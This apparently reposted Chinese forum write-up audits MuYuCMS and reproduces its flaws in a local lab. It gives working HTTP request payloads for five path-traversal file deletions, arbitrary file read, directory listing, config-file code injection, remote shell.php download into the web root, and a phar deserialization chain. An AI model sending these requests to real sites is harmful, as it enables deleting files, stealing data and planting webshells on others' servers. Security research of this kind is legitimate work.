木鱼cms系统审计小结

锦通  金牌会员 | 2023-2-22 11:32:12 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 553|帖子 553|积分 1659

MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。
[img=720,620.2816901408451]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455023.png[/img]​
  ‍
环境搭建

我们利用 phpstudy 来搭建环境,选择 Apache2.4.39 + MySQL5.7.26+ php5.6.9 ,同时利用 PhpStorm 来实现对项目的调试
[img=720,408.66995073891627]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455026.png[/img]​
  
漏洞复现分析 ‍

任意文件删除

我们在网站的根目录下创建一个文件 test.txt 用来校验文件是否被删除
[img=720,129.90978487161692]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455028.png[/img]​
任意文件删除一

漏洞复现
登录后台后构造数据包
  1. POST /admin.php/accessory/filesdel.html HTTP/1.1
  2. Host: test.test
  3. Content-Length: 55
  4. Accept: */*
  5. X-Requested-With: XMLHttpRequest
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  8. Origin: http://test.test
  9. Referer: http://test.test/admin.php/accessory/filelist.html
  10. Accept-Encoding: gzip, deflate
  11. Accept-Language: zh-CN,zh;q=0.9
  12. Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
  13. Connection: close
  15. filedelur=/upload/files/.gitignore/../../../../test.txt
复制代码
[img=720,322.64150943396226]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455029.png[/img]
文件被成功删除
[img=720,124.93827160493827]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455030.png[/img]
漏洞分析
\app\admin\controller\Accessory::filesdel​
​[img=720,316.8463395012068]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455031.png[/img]
通过参数 $filedelurl 拼接得到要删除文件的地址,利用 unlink 函数删除文件,中间没有做任何校验。
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
任意文件删除二

漏洞复现
登录后台后构造数据包
  1. POST /admin.php/accessory/picdel.html HTTP/1.1
  2. Host: test.test
  3. Content-Length: 54
  4. Accept: */*
  5. X-Requested-With: XMLHttpRequest
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  8. Origin: http://test.test
  9. Referer: http://test.test/admin.php/accessory/filelist.html
  10. Accept-Encoding: gzip, deflate
  11. Accept-Language: zh-CN,zh;q=0.9
  12. Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
  13. Connection: close
  15. picdelur=/upload/files/.gitignore/../../../../test.txt
复制代码
[img=720,321.75617404939237]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455032.png[/img]​
漏洞分析
​\app\admin\controller\Accessory::picdel​
[img=720,314.61444308445533]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455033.png[/img]
通过参数 $picdelur 拼接得到要删除图片的地址,利用 unlink 函数删除文件,中间没有做任何校验
任意文件删除三

漏洞复现
登录后台后构造数据包
  1. GET /editor/index.php?a=delete_node&type=file&path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
  2. Host: test.test
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. Origin: http://test.test
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Referer: http://test.test/editor/index.php
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
  12. Connection: close
复制代码
[img=720,322.6029008232066]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455034.png[/img]​
漏洞分析
\App\Controller\Controller::delete_node​
[img=720,262.4970083765457]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455035.png[/img]​
\App\Core\File::deleteFile​
[img=720,192.6315789473684]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455036.png[/img]
​\App\Controller\Controller::beforeFun​
[img=720,299.9283154121864]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455037.png[/img]
对传入的 path 判断了是否在合法的文件域中,但没有对传入的 path 没有进行跨目录的校验就删除了文件
任意文件删除四

漏洞复现
  1. POST /admin.php/database/sqldel.html HTTP/1.1
  2. Host: test.test
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. Origin: http://test.test
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Referer: http://test.test/editor/index.php
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
  12. Connection: close
  13. Content-Type: application/x-www-form-urlencoded
  14. Content-Length: 19
  16. name=../../test.txt
复制代码
[img=720,321.7261671243625]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455038.png[/img]​
漏洞分析
\app\admin\controller\Database::sqldel​
​[img=720,335.22419186652763]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455039.png[/img]
获取 post 传入的参数 name
[img=720,157.99488491048592]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455040.png[/img]
利用 delFile 函数删除文件
任意文件删除五

漏洞复现
登录后台后构造数据包
  1. POST /admin.php/update/rmdirr.html?dirname=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
  2. Host: test.test
  3. Content-Length: 0
  4. Accept: */*
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  6. X-Requested-With: XMLHttpRequest
  7. Origin: http://test.test
  8. Referer: http://test.test/admin.php/system/update.html
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341
  12. Connection: close
复制代码
[img=720,320.814408770556]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455041.png[/img]
漏洞分析
\app\admin\controller\Update::rmdirr​
[img=720,298.45906902086676]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455042.png[/img]
传入的参数 $dirname 经过简单的判断,然后调用 unlink 函数去删除
任意文件读取

漏洞复现
登录后构造数据包
  1. GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1
  2. Host: test.test
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. Origin: http://test.test
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Referer: http://test.test/editor/index.php
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
  12. Connection: close
复制代码
[img=720,324.3243243243243]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455043.png[/img]
成功读取文件信息
[img=720,124.94117647058823]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455044.png[/img]​
漏洞分析
\App\Controller\Controller::get_file​
[img=720,295.99356395816574]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455045.png[/img]​
列目录

漏洞复现
登录后构造数据包
  1. GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/1.1
  2. Host: test.test
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. Origin: http://test.test
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Referer: http://test.test/editor/index.php
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
  12. Connection: close
复制代码
[img=720,319.3730407523511]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455046.png[/img]​
成功将根目录下的信息显露出来
漏洞分析
\App\Controller\Controller::dir_list​
[img=720,169.0887193898033]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455047.png[/img]​
\App\Core\Jstree::getDir​
[img=720,271.219]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455048.png[/img]
\App\Controller\Controller::beforeFun​
[img=720,299.9283154121864]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455037.png[/img]
对传入的 dir_path判断了是否在合法的文件域中,但没有对传入的 dir_path没有进行跨目录的校验就打印出目录信息
任意代码执行

任意代码执行一

漏洞复现
登录后构造数据包,读取config 文件内容
  1. GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/1.1
  2. Host: test.test
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. Origin: http://test.test
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Referer: http://test.test/editor/index.php
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
  12. Connection: close
复制代码
此时需要获取的并不是文件内容,而是更改之后文件的key
[img=720,321.031652989449]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455049.png[/img]​
复制文件校验码 替换到下面数据包中
  1. GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content=<?php+phpinfo();+php?> HTTP/1.1
  2. Host: test.test
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. Origin: http://test.test
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Referer: http://test.test/editor/index.php
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
  12. Connection: close
复制代码
[img=720,319.3388429752066]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455050.png[/img]​
访问文件在网站上对应的位置,发现代码已经被成功执行
[img=720,179.908768373036]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455051.png[/img]​
也可以执行其他代码
[img=720,277.40506329113924]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455052.png[/img]​
漏洞分析
\App\Controller\Controller::save_file​
[img=720,138.0505415162455]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455053.png[/img]
save_file 有保存文件的操作,但是需要获取到文件的校验码。所以就可以通过先查询文件的相关信息,然后再对文件进行修改
\App\Core\File::setFileContent​
[img=720,423.2204273058885]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455054.png[/img]
任意代码执行二

漏洞复现
登录后构造数据包
  1. POST /admin.php/update/getFile.html?url=http://127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1
  2. Host: test.test
  3. Content-Length: 0
  4. Accept: */*
  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  6. X-Requested-With: XMLHttpRequest
  7. Origin: http://test.test
  8. Referer: http://test.test/admin.php/system/update.html
  9. Accept-Encoding: gzip, deflate
  10. Accept-Language: zh-CN,zh;q=0.9
  11. Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341;XDEBUG_SESSION=PHPSTORM
  12. Connection: close
复制代码
指定远程 url 下载文件,下载的文件保存到指定位置
[img=720,317.2737955346651]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455055.png[/img]​
访问指定的文件目录,发现代码被成功执行
​[img=720,404.7257383966245]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455056.png[/img]​
漏洞分析
\app\admin\controller\Update::getFile​
[img=720,385.98326359832635]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455057.png[/img]
通过 $url 指定获取远程文件的地址,$save_dir 指定保存文件的路径,并未对文件的内容和类型进行校验,所以就会产生代码执行漏洞 ‍
phar反序列化

漏洞复现
  1. [/code]生成 phar 序列化数据包 修改后缀,启动 python 服务器
  2. 构造数据包下载远程的文件到本地
  3. [code]GET /public/static/admin/static/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:8000/shell.png HTTP/1.1
  4. Host: test.test
  5. Upgrade-Insecure-Requests: 1
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  8. Accept-Encoding: gzip, deflate
  9. Accept-Language: zh-CN,zh;q=0.9
  10. Cookie: XDEBUG_SESSION=PHPSTORM
  11. Connection: close
复制代码
[img=720,323.25381306218225]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455059.png[/img]​
执行 phar 序列化
http://test.test/admin.php/update/rmdirr.html?dirname=phar://./public/upload/images/1676882763141961.png
[img=720,358.5943600867679]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455060.png[/img]​
  ‍
注意事项
在最开始,获取远程图片的时候,一直出现错误 提示 链接contentType不正确​ 通过在代码中查找,定位到问题位置
[img=720,86.00878945265681]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455061.png[/img]​
校验了 Content-Type 的值 经过不断的调试仍然发现不了问题出现在哪
但是发现通过 phpstudy 默认的 apache 服务是没问题的 通过抓包对比发现 一个是 Content-Type 另一个是 Content-type
[img=720,253.2824427480916]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455062.png[/img]​
[img=720,308.3100381194409]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455063.png[/img]
我直接修改了 python 的源代码 将其中的小写 t 替换成了大写 T ‍
漏洞分析
\app\admin\controller\Update::rmdirr​
[img=720,261.15649009300444]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455064.png[/img]
通过协议绕过了对文件名的检测然后触发了反序列漏洞
MuYuCMS-master/public/static/admin/static/ueditor/php/controller.php​
[img=720,96.87958115183245]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455065.png[/img]
[img=720,396.76056338028167]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202302211455066.png[/img]
更多靶场实验练习、网安学习资料,请点击这里>>
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

锦通

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表